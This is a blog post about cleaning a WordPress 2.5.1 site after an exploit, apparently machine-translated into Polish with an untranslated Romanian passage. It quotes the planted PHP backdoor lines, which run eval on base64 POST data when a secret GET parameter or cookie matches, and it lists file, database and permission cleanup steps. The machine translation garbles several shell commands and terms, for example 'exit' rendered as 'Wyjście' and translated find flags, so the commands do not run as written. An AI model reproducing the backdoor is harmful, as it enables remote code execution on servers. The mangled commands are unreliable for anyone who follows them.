Zanim przeczytasz ten post, musisz zobaczyć post tutaj, coś zrozumieć. :)

W kilku plikach blogów na stronie stealthsettings.com znalazłem kody podobne do poniższych, które pojawiły się w wyniku infekcji wykorzystać WordPress.:

<?php if($_GET[‚573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‚plik’])); Wyjście; }?>

I

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‚plik’])); Wyjście; }?>

W powyższym przypadku chodzi o plik xmlrpc.php z Senny, ale w jednym grep na serwerze widać, że tego typu kodów w źródłach jest całkiem sporo.

Czyszczenie zainfekowanych plików:

Oooookkkk…
1. Najlepsze rozwiązanie po wykonaniu kopia zapasowa- i wyczyściłem bazę danych, to jest sa USUWAĆ pliki WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.

Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.

./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‚plik’])); Wyjście; }?><?php get_header(); ?>

2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.

find . -name “*_new.php”
find . -name “*_old.php”
find . -name “*.jpgg”
find . -name “*_giff”
find . -name “*_pngg”
find . -name “wp-info.txt”

3. in /tmp , wyszukaj i usuń foldery takie jak tmpYwbzT2

Oczyszczanie SQL :

1. w tabeli tabela WP_Options sprawdź, czy istnieje i usuń linie: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 I opcje_wordpress.

2. Również w wp_options przejdź do aktywne_wtyczki i usuń, jeśli istnieje, wtyczkę kończącą się na jednym z rozszerzeń *_new.php, *_old.php, *.jpgg, *.giff, *.pngg lub jeśli jest to inne podejrzane rozszerzenie, sprawdź dokładnie.

3. W tabeli wp_użytkownicy, sprawdź, czy po prawej stronie kolumny nie ma użytkownika, który nie ma nic zapisanego nazwa_użytkownika. Usuń tego użytkownika, ale zapamiętaj numer w kolumnie ID. Ten użytkownik prawdopodobnie będzie używał „WordPress” jako login_użytkownika i wygląda na to, że został utworzony w dniu 00:00:00 0000-00-00.

4. Podejdź do stołu wp_usermeta i usuń wszystkie linie należące do powyższego identyfikatora.

Po wykonaniu czyszczenia sql dezaktywuj, a następnie aktywuj wtyczkę. (na blogu –> Panel -> Wtyczki)

Bezpieczeństwo serwera:

1. Zobacz, które katalogi i pliki są „zapisywalny” (chmod 777) i spróbuj umieścić a chmod które nie pozwolą już na ich pisanie na żadnym poziomie. (na przykład chmod 644)

znajdować . -perm -2 –ls

2. Zobacz, które pliki ustawiają bit południe lub poślizg . Jeśli nie używasz tych plików, załóż je chmod 0 lub odinstaluj pakiet, który je zawiera. Są bardzo niebezpieczni, bo wykonują wyroki z przywilejami”grupa"Lub"źródło”, a nie z uprawnieniami zwykłego użytkownika wykonującego ten plik.

znajdź / -wpisz f -perm -04000 -ls
znajdź / -wpisz f -perm -02000 -ls

3. Sprawdź, które porty są otwarte i spróbuj zamknąć lub zabezpieczyć te, które nie są używane.

netstat -an | grep -listuję

To tyle. Widzę to niektóre blogi są zakazane przez wyszukiwarkę Google, a inni mówią „Dobra robota!!!” . Cóż, zrobiłbym to dla nich… ale co powiesz, jeśli Google zacznie banować wszystkie witryny kto to robi SPAMUJĘ i pakuje trojany (Trojan.Clicker.HTML) w ciasteczkach?